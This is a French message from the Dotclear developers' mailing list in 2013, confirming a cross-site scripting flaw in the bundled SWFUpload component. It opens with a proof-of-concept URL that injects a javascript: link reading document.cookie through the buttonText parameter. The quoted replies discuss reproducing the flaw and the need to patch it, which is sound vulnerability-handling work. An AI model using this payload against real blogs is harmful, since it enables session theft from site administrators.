poc sur dotclear: <urldublog>/admin/index.php?pf=swfupload.swf&buttonText=<a%20href=%27javascript:alert(document.cookie)%27>Click%20me</a>
On est bien vulnérable. Le 11 mars 2013 23:34, Franck Paul <[email protected]> a écrit : > Perso je n'arrive pas à reproduire les deux exemples, j'obtiens une 404 à > chaque fois (en local et sur mon blog). > > Franck > > > 2013/3/11 Dsls <[email protected]> >> >> Je n'ai pas regardé en détails, mais il va falloir patcher... >> >> >> http://hackingexpose.blogspot.fr/2013/03/vulnerabilities-in-swfupload-in.html?utm_source=web&utm_medium=twitter&utm_campaign=security&m=1 >> >> >> _______________________________________________ >> Dev mailing list - [email protected] - >> http://ml.dotclear.org/listinfo/dev > > > > _______________________________________________ > Dev mailing list - [email protected] - > http://ml.dotclear.org/listinfo/dev _______________________________________________ Dev mailing list - [email protected] - http://ml.dotclear.org/listinfo/dev
